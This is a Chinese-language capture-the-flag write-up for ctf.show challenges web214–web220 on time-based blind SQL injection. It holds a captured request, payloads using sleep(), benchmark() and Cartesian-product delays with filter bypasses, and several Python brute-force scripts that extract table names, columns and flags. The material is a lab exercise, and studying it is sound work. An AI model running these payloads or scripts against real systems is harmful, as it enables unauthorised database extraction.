web214–时间盲注
原始信息
开始基于时间盲注
查询语句
//无
返回逻辑
//屏蔽危险分子
解题
啥都没有的情况,刷新主页面(不是那个支线的sqlmap页面)看抓包信息,抓到一个敏感数据包:
POST /api/ HTTP/1.1
Host: 6e127c7d-8aac-4895-b9bc-347848f17a0d.challenge.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 20
Origin: http://6e127c7d-8aac-4895-b9bc-347848f17a0d.challenge.ctf.show
Connection: close
Referer: http://6e127c7d-8aac-4895-b9bc-347848f17a0d.challenge.ctf.show/index.php
Cookie: PHPSESSID=jq29mbfflirbma38u1sr7u5i3f
ip=127.0.0.1&debug=0
得到明显的注入点:
ip=127.0.0.1&debug=0
尝试修改ip,得到正确的延时回显:
ip=if(1,sleep(5),1)&debug=0
开始测表:
ip=if(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),1,1)='a',sleep(5),1)&debug=0
使用bp爆破,对应的注点在 a,以及a左边算起第二个1。
爆出来的表名字:ctfshow_info,ctfshow_flagx
再尝试去爆字段:
ip=if(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='ctfshow_flagx')),1,1)='a',sleep(5),1)&debug=0
爆破出来的列名:id,flaga,info
如果是另外一张表:id,ip,cname
最后尝试爆出flag:
ip=if(mid((select(group_concat(flaga))where(ctfshow_flagx)),1,1)='a',sleep(5),1)&debug=0
这个flag关键字明显被过滤了,使用堆叠去注入他的表名:
# 改了半天,下面这个是正确的
#直接堆叠,再获取flag列的值。致命的弱点在于空格限制。
if(substring((select group_concat(una) e from (select 1,'una',3 union select * from test1) a),5,1)='a',sleep(3),1)
ctfshow{2ae0af79-57de-45c5-91ed-cb573e5da40d}
如果是脚本跑的话……可以参考下面,Burp速度虽然快,但是flag要自己手动拼接。而下面的脚本,速度虽然慢,但会主动拼接脚本:
# coding=utf-8
import requests,time
def GetData(url,payload,flag="",start=1,end=50,flagStrDict="{}ctfshow-0123456789abdegijklmnpqruvxyz"):
urls = url + "api/"
headers = {
"Content-Type": "application/x-www-form-urlencoded;charset=UTF-8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"X-Requested-With": "XMLHttpRequest",
"Origin": url,
"Referer": url,
"Cookie": "PHPSESSID=jq29mbfflirbma38u1sr7u5i3f",
}
for i in range(start,end):
mf = 0
for mid in flagStrDict:
data = {
"ip":payload.format(i,mid),
"debug":1
}
t = time.time()
req = requests.post(url=urls, headers=headers, data=data)
endTime = time.time() - t
time.sleep(0.3)
print(f"find time: {endTime} s \t and find payload: {payload.format(i,mid)}")
if endTime >= 3:
flag += mid
print(flag)
break
else:
mf += 1
# print(payload.format(i,mid))
if mf == len(flagStrDict):
print("flag is :"+flag)
break
# print(req.content)
if __name__ == "__main__":
# find database/tables/columns
flagStrDict1 = "ctfshow,_0123456789abdegijklmnpqruvxyz"
# find flag
flagStrDict2 = "{}ctfshow-0123456789abdegijklmnpqruvxyz"
def web214():
url = "http://7959807f-42f7-48f2-b2fe-ff5b2f8338eb.challenge.ctf.show/"
# find tables
payload1 = "if(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{},1)='{}',sleep(3),1)"
# find columns
payload2 = "if(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='ctfshow_flagx')),{},1)='{}',sleep(3),1)"
# find flag
payload3 = "if(substring((select group_concat(una) e from (select 1,'una',3 union select * from test1) a),{},1)='{}',sleep(3),1)"
GetData(url,payload=payload1,flagStrDict=flagStrDict1)
GetData(url,payload=payload2,flagStrDict=flagStrDict1)
GetData(url,payload=payload3,flagStrDict=flagStrDict2,start=5,end=55)
web214()
这个脚本因为是单线程爆破,很大程度上会受到网络波动的影响。最好就放BP进行快爆吧。
上面的payload3是爆破flag的,但是……总是失效,具体原因不知道,但确实是爆出来flag过 ╮(╯_╰)╭
…
稍微改装了下脚本:
import requests,time
def GetData2(url,payload,flag="",timeout=3,start=1,end=50,flagStrDict="{}ctfshow-0123456789abdegijklmnpqruvxyz"):
urls = url + "api/"
headers = {
"Content-Type": "application/x-www-form-urlencoded;charset=UTF-8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"X-Requested-With": "XMLHttpRequest",
"Origin": url,
"Referer": url,
"Cookie": "PHPSESSID=jq29mbfflirbma38u1sr7u5i3f",
}
for i in range(start,end):
mf = 0
for mid in flagStrDict:
data = {
"ip":payload.format(i,mid),
"debug":1
}
try:
t = time.time()
req = requests.post(url=urls, headers=headers, data=data,timeout=timeout)
endTime = time.time() - t
time.sleep(0.3)
mf += 1
print(f"find time: {int(endTime)} s \t and find payload: {payload.format(i,mid)}")
except Exception as e:
flag += mid
print(flag)
break
# print(payload.format(i,mid))
if mf == len(flagStrDict):
print("flag is :"+flag)
break
if __name__ == "__main__":
# find database/tables/columns
flagStrDict1 = "ctfshow,_0123456789abdegijklmnpqruvxyz"
# find flag
flagStrDict2 = "{}ctfshow-0123456789abdegijklmnpqruvxyz"
def web214():
url = "http://13f1f1cf-dc0b-44ec-ac58-65536d39760f.challenge.ctf.show/"
# find tables
payload1 = "if(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{},1)='{}',sleep(3),1)"
# find columns
payload2 = "if(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='ctfshow_flagx')),{},1)='{}',sleep(3),1)"
# find flag
payload3 = "if(substring((select flaga from ctfshow_flagx),{},1)='{}',sleep(3),1)"
# GetData2(url,payload=payload1,flagStrDict=flagStrDict1)
# GetData2(url,payload=payload2,flagStrDict=flagStrDict1)
GetData2(url,payload=payload3,flagStrDict=flagStrDict2,start=1,end=55)
web214()
web215
原始信息
开始基于时间盲注
查询语句
//用了单引号
返回逻辑
//屏蔽危险分子
解题
测试的时候不是过滤了单引号,而是新增了单引号。
下面是脚本:
# coding=utf-8
import requests,time
def GetData2(url,payload,flagStrDict,flag="",timeout=3,start=1,end=50,mode=1):
urls = url + "api/"
headers = {
"Content-Type": "application/x-www-form-urlencoded;charset=UTF-8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"X-Requested-With": "XMLHttpRequest",
"Origin": url,
"Referer": url,
"Cookie": "PHPSESSID=jq29mbfflirbma38u1sr7u5i3f",
}
for i in range(start,end):
mf = 0
for mid in flagStrDict:
data = {
"ip":payload.format(i,mid),
"debug":1
}
try:
t = time.time()
req = requests.post(url=urls, headers=headers, data=data,timeout=timeout)
endTime = time.time() - t
time.sleep(0.3)
mf += 1
print(f"find time: {int(endTime)} s \t and find payload: {payload.format(i,mid)}")
# print(req.content)
except Exception as e:
if mode == 1:
flag += mid
elif mode == 2:
flag += chr(int(mid,16))
print(flag)
break
if mf == len(flagStrDict):
print("flag is :"+flag)
break
if __name__ == "__main__":
# find database/tables/columns
flagStrDict1 = "ctfshow,_0123456789abdegijklmnpqruvxyz"
# find flag
flagStrDict2 = "-0123456789abdectfshowgijklmnpqruvxyz}{,_"
def web215():
url = "http://d86b4db8-c487-4cde-8209-1e104d9d5e51.challenge.ctf.show/"
payload1 = "select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())"
payload2 = "select(group_concat(column_name))from(information_schema.columns)where(table_name='ctfshow_flagxc')"
payload3 = "select flagaa from ctfshow_flagxc"
# id,flagaa,info
# GetData2(url,payload="'||if(mid(("+payload1+"),{},1)='{}',sleep(3),1)||'",flagStrDict=flagStrDict1,timeout=5)
# GetData2(url,payload="'||if(mid(("+payload2+"),{},1)='{}',sleep(3),1)||'",flagStrDict=flagStrDict1,timeout=5)
GetData2(url,flag='ctfshow{',start=9,end=55,payload="'||if(mid(("+payload3+"),{},1)='{}',sleep(5),1)||'",flagStrDict=flagStrDict2,timeout=5)
web215()
web216
原始信息
查询语句
where id = from_base64($id);
返回逻辑
//屏蔽危险分子
解题
照搬上一题脚本,修改未多线程爆破:
# coding=utf-8
import requests,threading,time,concurrent.futures
"""
多线程爆破脚本(省时间脚本)
"""
def send_request(url,headers,data,timeout,strs):
try:
req = requests.post(url=url, headers=headers, data=data, timeout=timeout)
time.sleep(0.3)
except Exception as e:
return strs
return ""
def GetData3(url,payload,flagStrDict,flag="",timeout=3,start=1,end=50,threadNum=3):
urls = url + "api/"
headers = {
"Content-Type": "application/x-www-form-urlencoded;charset=UTF-8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"X-Requested-With": "XMLHttpRequest",
"Origin": url,
"Referer": url,
"Cookie": "PHPSESSID=jq29mbfflirbma38u1sr7u5i3f",
}
allList = []
flagStr = ''
for index in range(start,end):
dataList = [[{'ip': payload.format(index, strsDict), 'debug': 1},f"{index}:{strsDict}"] for strsDict in flagStrDict]
with concurrent.futures.ThreadPoolExecutor(max_workers=threadNum) as executor:
tasks = []
for data in dataList:
task = executor.submit(send_request, urls,headers,data[0],timeout,data[1])
tasks.append(task)
# 处理返回结果
results = []
for task in tasks:
result = task.result()
if result:
flagStr += (result.split(':'))[1]
results.append(result)
if results:
allList.append(results)
else:
break
print(flagStr)
string = flag
for i in allList:
if i!=[] or i!=[[]] or bool(i):
string += (i[0].split(':'))[-1]
print('flag: ',string)
if __name__ == "__main__":
# find database/tables/columns
flagStrDict1 = "ctfshow,_0123456789abdegijklmnpqruvxyz"
# find flag
flagStrDict2 = "-0123456789abdectfshowgijklmnpqruvxyz}{,_"
def web216():
url = "http://8c908286-df0a-42c6-8fe7-c94445d8f432.challenge.ctf.show/"
payload1 = "select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())"
payload2 = "select(group_concat(column_name))from(information_schema.columns)where(table_name='ctfshow_flagxcc')"
payload3 = "select(group_concat(flagaac))from(ctfshow_flagxcc)"
# ctfshow_flagxcc,ctfshow_info
# GetData3(url,payload="to_base64({})".format("if(mid(("+payload1+"),{},1)='{}',sleep(5),1)"),flagStrDict=flagStrDict1,timeout=5)
# id,flagaac,info
# GetData3(url,payload="to_base64({})".format("if(mid(("+payload2+"),{},1)='{}',sleep(5),1)"),flagStrDict=flagStrDict1,timeout=5)
GetData3(url, flag='ctfshow{', start=9, end=55,payload="to_base64({})".format("if(mid(("+payload3+"),{},1)='{}',sleep(5),1)"), flagStrDict=flagStrDict2, timeout=5)
web216()
payload部分在于:
def web216():
url = "http://8c908286-df0a-42c6-8fe7-c94445d8f432.challenge.ctf.show/"
payload1 = "select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())"
payload2 = "select(group_concat(column_name))from(information_schema.columns)where(table_name='ctfshow_flagxcc')"
payload3 = "select(group_concat(flagaac))from(ctfshow_flagxcc)"
# ctfshow_flagxcc,ctfshow_info
# GetData3(url,payload="to_base64({})".format("if(mid(("+payload1+"),{},1)='{}',sleep(5),1)"),flagStrDict=flagStrDict1,timeout=5)
# id,flagaac,info
# GetData3(url,payload="to_base64({})".format("if(mid(("+payload2+"),{},1)='{}',sleep(5),1)"),flagStrDict=flagStrDict1,timeout=5)
GetData3(url, flag='ctfshow{', start=9, end=55,payload="to_base64({})".format("if(mid(("+payload3+"),{},1)='{}',sleep(5),1)"), flagStrDict=flagStrDict2, timeout=5)
其中,要注意点在于:网络不好就没必要跑脚本了,因为实在……太依赖网络状态了。。。
半夜开了5G测试,一直出错误。同一个payload放BP跑了不到五分钟就全出来了,我……
web217
原始信息
查询语句
where id = ($id);
返回逻辑
//屏蔽危险分子
function waf($str){
return preg_match('/sleep/i',$str);
}
解题
这个题目过滤了 sleep
,导致常用延时注入函数被过滤。这里对 sleep
的平替方案为:
select sleep(3):
# 平替为:
select benchmark(3500000,md5('www'));
具体的平替时间是测试出来的,使用 Burp
抓包出来进行平替测试即可。
具体测试方案就是:设置 3s
延迟,让后放上这种句子进行测试:ip=if(1,benchmark(3500000,md5('www')),1)&debug=1
.
脚本如下,注意网络环境对延时注入的影响。
# coding=utf-8
import requests,time,concurrent.futures
"""
多线程爆破脚本
"""
def send_request(url,headers,data,timeout,strs):
try:
req = requests.post(url=url, headers=headers, data=data, timeout=timeout)
time.sleep(0.3)
except Exception as e:
return strs
return ""
def GetData3(url,payload,flagStrDict,flag="",timeout=3,start=1,end=50,threadNum=5):
urls = url + "api/"
headers = {
"Content-Type": "application/x-www-form-urlencoded;charset=UTF-8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"X-Requested-With": "XMLHttpRequest",
"Origin": url,
"Referer": url,
"Cookie": "PHPSESSID=jq29mbfflirbma38u1sr7u5i3f",
}
allList = []
flagStr = flag
for index in range(start,end):
dataList = [[{'ip': payload.format(index, strsDict), 'debug': 1},f"{index}:{strsDict}"] for strsDict in flagStrDict]
with concurrent.futures.ThreadPoolExecutor(max_workers=threadNum) as executor:
tasks = []
for data in dataList:
task = executor.submit(send_request, urls,headers,data[0],timeout,data[1])
tasks.append(task)
# 处理返回结果
results = []
for task in tasks:
result = task.result()
if result:
flagStr += (result.split(':'))[1]
# print([result],type(result))
results.append(result)
if results:
allList.append(results)
else:
print("No results {}".format(index))
break
print(flagStr)
string = flag
for i in allList:
if i!=[] or i!=[[]] or bool(i):
string += (i[0].split(':'))[-1]
print('flag: ',string)
# t = threading.Thread(target=send_request,args=(urls,headers,data,timeout,flag,mid,i,payload))
if __name__ == "__main__":
# find database/tables/columns
flagStrDict1 = "ctfshow,_0123456789abdegijklmnpqruvxyz"
# find flag
flagStrDict2 = "-0123456789abdectfshowgijklmnpqruvxyz}{,_"
def web217():
url = "http://4afe2ce4-af43-46e5-a9c1-79b4b85cb45f.challenge.ctf.show/"
payload1 = "select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())"
payload2 = "select(group_concat(column_name))from(information_schema.columns)where(table_name='ctfshow_flagxccb')"
payload3 = "select(group_concat(flagaabc))from(ctfshow_flagxccb)"
# ctfshow_flagxccb,ctfshow_info
# GetData3(url,payload="{}".format("if(mid(("+payload1+"),{},1)='{}',benchmark(3500000,md5('www')),1)"),flagStrDict=flagStrDict1,timeout=5)
# id,flagaabc,info
# GetData3(url,flag='id,flag',start=8,payload="{}".format("if(mid(("+payload2+"),{},1)='{}',benchmark(3500000,md5('www')),1)"),flagStrDict=flagStrDict1,timeout=5)
GetData3(url, flag='ctfshow{', start=9, end=55,payload="{}".format("if(mid(("+payload3+"),{},1)='{}',benchmark(3500000,md5('www')),1)"), flagStrDict=flagStrDict2, timeout=5)
web217()
web218
原始信息
查询语句
where id = ($id);
返回逻辑
//屏蔽危险分子
function waf($str){
return preg_match('/sleep|benchmark/i',$str);
}
解题
这过滤……又要寻找平替方案……
还有一个平替方案,利用大量的查询消耗时间:
if(mid(1,(SELECT COUNT(*) FROM information_schema.tables a, information_schema.tables b, information_schema.tables c,information_schema.tables d),1)
其中的 SELECT COUNT(*) FROM information_schema.tables a, information_schema.tables b, information_schema.tables c,information_schema.tables d
便是起到平替作用的sql查询语句。(笛卡尔积)
如果是使用延迟2s的话,特别考验爆破者的网络环境。特别是这种情况下特别容易出现flag错误的情况。
注意:这里的爆破延迟是1.7s,测试的具体方式是从Burp看回显时间测试出来的。
使用要求:
- 测试者正常回显(非测试笛卡尔积)的情况下延迟在0到1s之间。
- 测试者测试笛卡尔积的时候延迟在1.7或者大于1.7的范围。
下面是脚本:
# coding=utf-8
import requests,time,concurrent.futures
from colorama import Fore, Back, Style, init
init()
"""
单线程爆破
"""
def GetData5(url,payload,flagStrDict,flag="",timeout=3.0,start=1,end=50,mode=1):
"""
单线程爆破
:param url:目标url
:param payload:payload模板
:param flagStrDict:flag字典
:param flag:flag
:param timeout:超时时间
:param start:开始
:param end:结束
:param mode:模式
:return:
"""
urls = url + "api/"
headers = {
"Content-Type": "application/x-www-form-urlencoded;charset=UTF-8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"X-Requested-With": "XMLHttpRequest",
"Origin": url,
"Referer": url,
"Cookie": "PHPSESSID=jq29mbfflirbma38u1sr7u5i3f",
}
thresholdNumber = 2
for i in range(start,end):
mf = 0
for mid in flagStrDict:
data = {
"ip":payload.format(i,mid),
"debug":1
}
t1 = time.time()
thresholds = 0
# 使用数据包阈值来过滤废包
# 经过测试,当前网络环境当中延迟1.7是笛卡尔积的极限。具体测试方法是把数据包转发到BP当中,尝试使用笛卡尔积直接发数据测试极限时间
try:
t = time.time()
req = requests.post(url=urls, headers=headers, data=data,timeout=timeout)
endTime = time.time() - t
time.sleep(0.3)
print(Style.BRIGHT+'find time',
Style.RESET_ALL +f": {endTime:.3f} s \t ",
Style.BRIGHT+'and find payload',
Style.RESET_ALL +f": {payload.format(i,mid)}"
)
# print(req.content)
except Exception as e:
for threshold in range(thresholdNumber):
try:
t = time.time()
req = requests.post(url=urls, headers=headers, data=data, timeout=timeout)
endTime = time.time() - t
time.sleep(0.3)
print(Style.BRIGHT + 'find time',
Style.RESET_ALL + f": {endTime:.3f} s \t ",
Style.BRIGHT + 'and find payload',
Style.RESET_ALL + f": {payload.format(i, mid)}"
)
except Exception as e:
thresholds += 1
print(Fore.RED+'the number',Style.BRIGHT+f": {thresholds} ",Style.RESET_ALL + "-")
endTime = time.time() - t1
if mode == 1 and thresholds == thresholdNumber:
flag += mid
# print(f"index: {i}\t all time:{endTime:.3f}\t flag:{flag}")
print(f"{Back.GREEN+'index'}: {i}","\t",f"{Back.GREEN+'all time'}:",Style.BRIGHT+f"{endTime:.3f}","\t ",Back.GREEN+'flag',":",Style.BRIGHT+f'{flag}',Style.RESET_ALL + "-")
break
elif mode == 2 and thresholds == thresholdNumber:
flag += chr(int(mid,16))
# print(f"{Back.GREEN+'index'}: {i}\t {Back.GREEN+'all time'}:{endTime:.3f}\t {Back.GREEN+'flag'}:{Style.BRIGHT+'flag'}",end=' ')
print(f"{Back.GREEN+'index'}: {i}","\t",f"{Back.GREEN+'all time'}:",Style.BRIGHT+f"{endTime:.3f}","\t ",Back.GREEN+'flag',":",Style.BRIGHT+f'{flag}',Style.RESET_ALL + "-")
print(Style.RESET_ALL + "-")
break
else:
mf += 1
# print(payload.format(i,mid))
if mf == len(flagStrDict):
print("flag is :"+flag)
break
if __name__ == "__main__":
# find database/tables/columns
flagStrDict1 = "ctfshow,_0123456789abdegijklmnpqruvxyz"
# find flag
flagStrDict2 = "-0123456789abdectfshowgijklmnpqruvxyz}{,_"
flagStrDict3 = "id,flagah,infoctfshow,_0123456789abdegijklmnpqruvxyz"
flagStrDict4 = "id,flagno_0123456789bcehjkmpqrstuvwxyz"
def web218():
url = "http://736e0672-8f98-43d0-ae4d-3660b56cfda7.challenge.ctf.show/"
payload1 = "select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())"
payload2 = "select(group_concat(column_name))from(information_schema.columns)where(table_name='ctfshow_flagxc')"
payload3 = "select(group_concat(flagaac))from(ctfshow_flagxc)"
timeOutFunction = "(SELECT COUNT(*) FROM information_schema.tables a, information_schema.tables b, information_schema.tables c)"
# ctfshow_flagxc,ctfshow_info
# GetData5(url,flag='ctfshow_',start=9,payload="if(mid((" + payload1 + "),{},1)='{}',"+timeOutFunction+",1)",flagStrDict=flagStrDict1,timeout=1.7)
# id,flagaac,info
# GetData5(url,payload="if(mid((" + payload2 + "),{},1)='{}',"+timeOutFunction+",1)",flagStrDict=flagStrDict4,timeout=1.7)
"""
ctfshow{3e19223f-d564-4aae-945e-55a2656f1c27}
ctfshow{3e192230-d564-4aae-945e-56a2656f1c27}
ctfshow{3e19223f-d564-4aae-945e-56a2656f1c27}
"""
GetData5(url,flag='ctfshow{', start=9, end=55,payload="if(mid((" + payload3 + "),{},1)='{}',"+timeOutFunction+",1)",flagStrDict=flagStrDict2,timeout=1.7)
web218()
多跑两次,flag有一定概率会出错,测试的时候多测试两次不会吃亏。如果能一次提交正确就没必要测了。
web219
原始信息
查询语句
where id = ($id);
返回逻辑
//屏蔽危险分子
function waf($str){
return preg_match('/sleep|benchmark|rlike/i',$str);
}
解题
没有限制到笛卡尔积,沿用上面的脚本即可。
web220
原始信息
查询语句
where id = ($id);
返回逻辑
//屏蔽危险分子
function waf($str){
return preg_match('/sleep|benchmark|rlike|ascii|hex|concat_ws|concat|mid|substr/i',$str);
}
解题
首先考虑时间盲注,依然还是只能使用笛卡尔积。
其次考虑其它payload点位的限制。
上次的payload是带有concat/mid
两种的,而这两种恰巧对应组合和切割两种情况。
concat
对应限制 group_concat
列组合方法,用 limit {} 1
绕过。 {}
是爆破的第 0
行到第 n
行。
mid
采用 left/right
两种的其中一种进行绕过。这俩都是切割函数,但是没有 mid
的按位置切割,只能从头切割到末尾/从末尾切割到头。
注意:这里还是得注意下网络的延迟问题。延迟测算好后再用payload。
下面是脚本:
# coding=utf-8
import requests,time,concurrent.futures
from colorama import Fore, Back, Style, init
init()
def GetData6(url,payload,flagStrDict,flag="",timeout=3.0,start=1,end=50,mode=1):
"""
单线程爆破
:param url:目标url
:param payload:payload模板
:param flagStrDict:flag字典
:param flag:flag
:param timeout:超时时间
:param start:开始
:param end:结束
:param mode:模式
:return:
"""
urls = url + "api/"
headers = {
"Content-Type": "application/x-www-form-urlencoded;charset=UTF-8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"X-Requested-With": "XMLHttpRequest",
"Origin": url,
"Referer": url
}
# 容错数据包次数
thresholdNumber = 4
flagTest = ''
# 控制查表的爆破行
for rows in range(10):
flagTemp = ''
# flagEnd = flagTemp
# 控制查表爆破行中的列数据
for columns in range(start,end):
mf = 0
# 控制查表爆破列的数据匹配
for strDict in flagStrDict:
# 使用十六进制的形式避免出现非预期情况
payloadEd = '0x'+''.join([(hex(ord(i))).replace('0x','') for i in flagTemp+strDict])
data = {
"ip":payload.format(rows,columns,payloadEd),
"debug":1
}
# 容错变量
thresholds = 0
# 使用数据包阈值来过滤废包
# 经过测试,当前网络环境当中延迟1.7是笛卡尔积的极限。具体测试方法是把数据包转发到BP当中,尝试使用笛卡尔积直接发数据测试极限时间
t1 = time.time()
def miniNumber():
t = time.time()
requests.post(url=urls, headers=headers, data=data, timeout=timeout)
endTime = time.time() - t
time.sleep(0.3)
print(Style.BRIGHT + 'Find time', end=":")
print(Style.RESET_ALL + f"{endTime:.3f} s \t ", end="")
print(Style.BRIGHT + 'And find payload', end=':')
print(Style.RESET_ALL + f"{payload.format(rows, columns, payloadEd)}")
try:
miniNumber()
except Exception as e:
# 经过第一层超时后进行容错处理
for threshold in range(thresholdNumber):
try:
miniNumber()
except Exception as e:
thresholds += 1
print(Fore.RED + 'the number',end=" : ")
print(Style.BRIGHT + f"{thresholds} ",end="")
print(Style.RESET_ALL + "")
endTime = time.time() - t1
if thresholds == thresholdNumber:
# 容错成功后组合flag字符串/关键字符串
flagTemp += strDict
print(f"{Back.GREEN + 'index'}: {rows} {columns}", end="\t")
print(f"{Back.GREEN + 'all time'}",end=":")
print(Style.BRIGHT + f"{endTime:.3f}",end="\t ")
print(Back.GREEN + 'flag', end=":")
print(Style.BRIGHT + f'{flagTemp}',end='')
print(Style.RESET_ALL + "")
break
else:
mf += 1
if mf == len(flagStrDict):
#列数据结束标志
print("flag is :" + flagTemp)
print('all :',flagTest)
break
if '' == flagTemp:
#行数据结束标志
print('flag is :' + flagTest)
break
else:
flagTest += flagTemp if flagTest == '' else ','+flagTemp
print(flagTest)
if __name__ == "__main__":
# 字符串字典
# find database/tables/columns
flagStrDict1 = "ctfshow,_0123456789abdegijklmnpqruvxyz"
# find flag
flagStrDict2 = "-0123456789abdectfshowgijklmnpqruvxyz}{,_"
flagStrDict4 = "id,flagno_0123456789bcehjkmpqrstuvwxyz"
def web220():
url = "http://8f817a4c-a121-4798-8e3c-35669806ab66.challenge.ctf.show/"
payload1 = "select(table_name)from(information_schema.tables)where(table_schema=database()) limit {},1"
payload2 = "select(column_name)from(information_schema.columns)where(table_name='ctfshow_flagxcac') limit {},1"
payload3 = "select(flagaabcc)from(ctfshow_flagxcac) limit {},1"
print(url)
"""
payload
if(left((select(xxx)from(yyyy0)limit {3},1),{1})='{2}',?,1)
切割的办法:
假设:a=ctfshow_flagxca
left(a,1) = c
left(a,2) = ct
left(a,3) = ctf
3 点位,列点位1个,行点位2个 该修改爆破的框架了
"""
timeOutFunction = "(SELECT COUNT(*) FROM information_schema.tables a, information_schema.tables b, information_schema.tables c)"
# 爆库 ctfshow_flagxcacetscstxc,ctfshow_info
# GetData6(url,flag='',start=1,payload="if(left((" + payload1 + "),{})={},"+timeOutFunction+",1)",flagStrDict=flagStrDict1,timeout=1.7)
# 爆列 id,flagaabcc,info
# GetData6(url,flag='',start=1,payload="if(left((" + payload2 + "),{})={},"+timeOutFunction+",1)",flagStrDict=flagStrDict4,timeout=1.7)
# 获取flag
GetData6(url,flag='',start=1,payload="if(left((" + payload3 + "),{})={},"+timeOutFunction+",1)",flagStrDict=flagStrDict2,timeout=1.7)
# test(url)
web220()